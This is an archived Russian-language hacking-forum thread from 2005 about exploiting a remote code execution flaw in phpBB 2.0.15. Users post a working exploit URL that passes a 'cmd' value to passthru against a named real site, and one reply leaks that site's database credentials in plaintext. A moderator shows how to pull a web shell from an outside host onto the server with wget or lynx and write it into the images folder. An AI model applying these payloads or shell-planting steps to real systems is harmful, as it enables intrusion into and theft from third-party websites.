ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.07.2005, 02:14
|
|
Флудер
Регистрация: 18.01.2005
Сообщений: 2,298
Провел на форуме:
13936387
Репутация:
1844
|
|
Сообщение от m0nzt3r
про права я не помню эти буковки))попробуй в images или tmp, да и вобще дай ссылку....динар по этой ссылке говорит что нету такой темы..
Попробуй другой топик открыть
|
|
|
03.07.2005, 02:37
|
|
Флудер
Регистрация: 18.01.2005
Сообщений: 2,298
Провел на форуме:
13936387
Репутация:
1844
|
|
На некоторых форумах выдаётся вот такая штука!!!
Fatal error: Call to undefined function phpbb_rtrim() in /pub/home/motorolk/motor/forum/viewtopic.php on line 498
Чё это такое?
|
|
|
|
03.07.2005, 03:09
|
|
Флудер
Регистрация: 18.01.2005
Сообщений: 2,298
Провел на форуме:
13936387
Репутация:
1844
|
|
http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'
А чё дальше то делать?
Как шелл залить в форум ??? 
Последний раз редактировалось dinar_007; 03.07.2005 в 03:25..
|
|
|
|
03.07.2005, 04:43
|
|
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128
Репутация:
15
|
|
Сообщение от dinar_007
http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'
А чё дальше то делать?
Как шелл залить в форум ??? $dbms = 'mysql';
$dbhost = 'localhost';
$dbname = 'blend129_form';
$dbuser = 'blend129_form';
$dbpasswd = '109033';
|
|
|
|
03.07.2005, 05:02
|
|
Новичок
Регистрация: 01.07.2005
Сообщений: 13
Провел на форуме:
97568
Репутация:
0
|
|
Подскажите плиз, как спомощью вот этого (http://target/forum/viewtopic.php?t=536&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).')
можно залить файлы на сервак ?
|
|
|
|
03.07.2005, 12:31
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Ну есть масса способов..
можешь через exec() залить..
но проще узнать сначала БД (в файле конфига). Может логин и пасс и для фтп подойдут).
|
|
|
|
03.07.2005, 13:40
|
|
Новичок
Регистрация: 01.07.2005
Сообщений: 13
Провел на форуме:
97568
Репутация:
0
|
|
Rebz, приведи для начинающих пример этой команды плизз
|
|
|
|
03.07.2005, 14:29
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Я немного не в ту степь пошёл.. =)
Попробуй wget-ом.. если он не поддерживается, то можно lynx-ом.
Синаксис такой:
lynx -source http://здесь_урл_шелла/shell.php>>1.php
после знака >> мы вводим название, которое будет на сайте служить вам шеллом. Также можно сразу указать др.путь, например, .... >>./images/1.php (ваш шелл будет записан в папку images).
Ну и т.д. по аналогии...
|
|
|
|
03.07.2005, 17:53
|
|
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
Провел на форуме:
172723
Репутация:
5
|
|
Сообщение от vorishka
temon ты эта: config.php открой посмотри в HTML коде =))) Прокатит...
Повторяю свой вопрс: Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...
как его открыть подробнее пожалуйста напиши.
|
|
|
|
04.07.2005, 07:33
|
|
Banned
Регистрация: 13.06.2005
Сообщений: 44
Провел на форуме:
153475
Репутация:
0
|
|
Я тут новенький. У меня возникли вопросы что делать после того как я узнал пароль
к БД? и еще - эта уязвимость только к phpbb 2.0.15? (к прешедствующим версиям не идет?)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
